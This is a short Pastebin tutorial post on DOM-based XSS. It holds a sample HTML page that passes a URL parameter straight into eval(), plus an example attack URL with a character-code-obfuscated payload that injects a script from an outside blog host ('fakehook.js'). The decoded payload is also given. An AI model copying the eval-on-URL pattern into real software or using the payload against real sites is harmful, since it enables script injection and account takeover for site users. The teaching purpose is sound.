Neonprimetime

DOM XSS 101 Walk-Through

Jan 4th, 2016
325
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. DOM XSS 101 Walk-Through
  2. *******
  3. Blog discussing this: http://neonprimetime.blogspot.com/2016/01/dom-xss-101-walk-through.html
  4. *******
  5. <html>
  6. <body>
  7. <script type="text/javascript">
  8.     function logUserId(userid){
  9.         console.log('debug: userid found was \'' + userid + '\'');
  10.     }
  11.     var myurl = window.location.href;
  12.     var useridstartindex = myurl.indexOf("userid=") + 7;
  13.     var userid = myurl.substring(useridstartindex,myurl.length);
  14.     var calllogfunction = 'logUserId(' + userid.toString() + ')'
  15.     eval(calllogfunction);
  16. </script>
  17. </body>
  18. </html>
  19. <!-- DOM XSS Example url: hxxp://myurl.com/domxsstest.html?userid=123456);eval(String.fromCharCode(115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,110,101,111,110,112,114,105,109,101,116,105,109,101,46,98,108,111,103,115,112,111,116,46,99,111,109,47,102,97,107,101,104,111,111,107,46,106,115,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59))// -->
  20. <!-- DOM XSS Example code: s=document.createElement('script'); s.src='http://neonprimetime.blogspot.com/fakehook.js'; document.getElementsByTagName('head')[0].appendChild(s); -->
  21.  
  22.  
  23. *******
  24. *******
  25. *******
  26. More FROM @neonprimetime security
  27.  
  28. http://pastebin.com/u/Neonprimetime
  29. https://www.virustotal.com/en/USER/neonprimetime/
  30. https://twitter.com/neonprimetime
  31. https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment